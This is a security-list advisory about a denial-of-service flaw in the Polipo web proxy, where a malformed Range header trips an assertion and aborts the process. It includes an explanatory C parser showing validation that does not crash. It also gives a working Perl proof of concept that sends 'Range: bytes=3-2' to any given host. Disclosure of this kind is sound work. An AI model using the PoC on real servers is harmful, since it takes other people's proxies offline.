
List:       oss-security
Subject:    [oss-security] Polipo: denial-of-service using range
From:       Alexandr Savca (chinarulezzz) <alexandr.savca89 () gmail ! com>
Date:       2020-11-18 15:12:06
Message-ID: 20201118171206.443be0215d1b142b5ce7584e () gmail ! com

Hi all,


I suppose I found a vulnerability in Polipo [1], a lightweight,
caching web proxy.


Since the author wrote that he no longer maintains this project [2],
I decided to write here, because Polipo is widely used in Linux/BSD [3]
and there are many maintainers.


Summary
=======

It is possible to cause a denial of service through a specific
Range header value.


Overview
========

RFC7233 states [4]:

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
A server that supports range requests MAY ignore or reject a Range
header field that consists of more than two overlapping ranges, or a
set of many small ranges that are not listed in ascending order,
since both are indications of either a broken client or a deliberate
denial-of-service attack (Section 6.1). ...
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Polipo doesn't ignore/reject the malformed header. Instead, it has
an assertion:

    server.c:1473: assert(from >= 0 && (to < 0 || to > from));

So, a malformed Range header ("Range: bytes=3-2" for example) will
cause the assertion to fail, which aborts the process.  This error
handling allows an attacker to cause a denial of service.
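
As an added example, not Polipo's code: a parser for a single
byte-range-spec that follows RFC 7233 section 2.1 (a last-byte-pos
smaller than the first-byte-pos makes the spec syntactically invalid,
and the recipient then ignores the Range header) and reports the
malformed case through a return value instead of an assert().  The
function names, the struct and the 200/206/416 mapping are assumptions
of this example; it handles one range-spec only and treats a multi-range
set as "ignore the header", which the RFC also permits a server to do.
The header value is assumed to be already trimmed of surrounding
whitespace.

```c
/* Added example (not Polipo's code): parse an HTTP Range value so that a
 * malformed byte-range-spec such as "bytes=3-2" is reported to the caller
 * and the header ignored, rather than tripping an assert() that aborts
 * the whole proxy. */
#include <ctype.h>
#include <limits.h>
#include <stdio.h>
#include <string.h>

enum range_status { RANGE_OK = 0, RANGE_IGNORE = 1 };

/* One byte-range-spec; -1 marks a field that was not given. */
struct byte_range {
    long first;   /* first-byte-pos ("500-999" -> 500, "500-" -> 500) */
    long last;    /* last-byte-pos, inclusive; -1 when open-ended */
    long suffix;  /* suffix-length for "-500"; -1 otherwise */
};

/* Read a decimal number at s[*i]. Returns 0 on no digits or on overflow. */
static int parse_digits(const char *s, size_t *i, long *out)
{
    size_t start = *i;
    long v = 0;
    while (isdigit((unsigned char)s[*i])) {
        int d = s[*i] - '0';
        if (v > (LONG_MAX - d) / 10)   /* would overflow: treat as malformed */
            return 0;
        v = v * 10 + d;
        (*i)++;
    }
    if (*i == start)
        return 0;
    *out = v;
    return 1;
}

/* Parse a single-range "bytes=..." value. A second range (a comma) or any
 * other trailing junk makes the whole header "ignore". */
int parse_byte_range(const char *value, struct byte_range *r)
{
    size_t i = 0;
    long from = 0, to = 0;
    int have_from, have_to;

    r->first = r->last = r->suffix = -1;
    if (strncmp(value, "bytes=", 6) != 0)   /* unknown or missing range unit */
        return RANGE_IGNORE;
    i = 6;
    have_from = parse_digits(value, &i, &from);
    if (value[i] != '-')
        return RANGE_IGNORE;
    i++;
    have_to = parse_digits(value, &i, &to);
    if (value[i] != '\0')                   /* trailing junk or a second range */
        return RANGE_IGNORE;

    if (!have_from && !have_to)             /* "bytes=-" */
        return RANGE_IGNORE;
    if (have_from && have_to && to < from)  /* "bytes=3-2": the case Polipo asserts on */
        return RANGE_IGNORE;
    if (!have_from) {
        r->suffix = to;
        return RANGE_OK;
    }
    r->first = from;
    r->last = have_to ? to : -1;
    return RANGE_OK;
}

/* Status code a server should send for this Range value and representation
 * length: 206 partial content, 200 with the header ignored, or 416 when the
 * range is well-formed but unsatisfiable. No input path reaches an abort. */
int range_response_status(const char *value, long length)
{
    struct byte_range r;
    if (parse_byte_range(value, &r) != RANGE_OK)
        return 200;                         /* malformed: ignore the header */
    if (r.suffix >= 0)
        return (r.suffix == 0 || length == 0) ? 416 : 206;
    if (r.first >= length)                  /* nothing to serve: unsatisfiable */
        return 416;
    return 206;
}

int main(void)
{
    /* Constructed sample header values, including the one from this report. */
    const char *samples[] = { "bytes=0-499", "bytes=500-", "bytes=-500",
                              "bytes=3-2", "bytes=2000-", "items=1-2" };
    size_t n;
    for (n = 0; n < sizeof samples / sizeof samples[0]; n++)
        printf("%-12s -> %d\n", samples[n], range_response_status(samples[n], 1000));
    return 0;
}
```

The design point is that validation of attacker-controlled input ends in
a return code the request handler can act on (here: fall back to a full
200 response), while assert() is reserved for invariants the program
itself guarantees.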


PoC
===

#!/usr/bin/perl
use autodie;
use Socket;

$host = $ARGV[0];
$port = $ARGV[1];

$iaddr = inet_aton($host);
$paddr = sockaddr_in($port, $iaddr);
$proto = getprotobyname('tcp');

socket(SOCK, PF_INET, SOCK_STREAM, $proto);
connect(SOCK, $paddr);
send(SOCK, "GET http:// HTTP/1.1\r\n", 0);
send(SOCK, "Range: bytes=3-2\r\n\r\n", 0);
print while <SOCK>;


Affected Versions
=================

All


Links
=====

[1] https://www.irif.fr/~jch//software/polipo/

[2] https://github.com/jech/polipo/commit/4d42ca1b5849518762d110f34b6ce2e03d6df9ec

[3] https://repology.org/project/polipo/badges

[4] https://tools.ietf.org/html/rfc7233#section-3.1

-- 
Kind Regards,
Alexandr
